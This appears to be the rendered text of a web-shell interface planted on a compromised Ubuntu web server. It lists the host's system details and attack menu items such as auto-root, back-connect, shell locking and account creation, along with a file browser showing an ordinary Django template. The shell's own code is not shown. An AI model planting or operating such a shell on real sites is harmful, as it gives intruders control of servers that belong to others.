Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
vicas-dev /
mission /
templates /
mission /
[ HOME SHELL ]
Name
Size
Permission
Action
add_mission_vision.html
1.56
KB
-rw-r--r--
mission_vision.html
1016
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mission_vision.html
{% extends "base.html" %} {% block content %} <div class="max-w-4xl mx-auto py-10"> <div class="flex justify-between items-center mb-6"> <h1 class="text-3xl font-bold">Mission & Vision</h1> <a href="{% url 'add_mission_vision' %}" class="bg-blue-600 text-white px-4 py-2 rounded hover:bg-blue-700" > + Add </a> </div> {% if mv %} <ol class="space-y-6 list-decimal list-inside"> {% for item in mv %} <li class="bg-gray-50 shadow-md rounded-lg p-6 border border-gray-200"> <div class="mb-4"> <h2 class="text-2xl font-bold text-blue-800">Mission</h2> <p class="text-gray-700">{{ item.mission_text }}</p> </div> <div> <h2 class="text-2xl font-bold text-green-800">Vision</h2> <p class="text-gray-700">{{ item.vision_text }}</p> </div> </li> {% endfor %} </ol> {% else %} <p class="text-gray-600"> No Mission & Vision entries available. Please add one. </p> {% endif %} </div> {% endblock %}
Close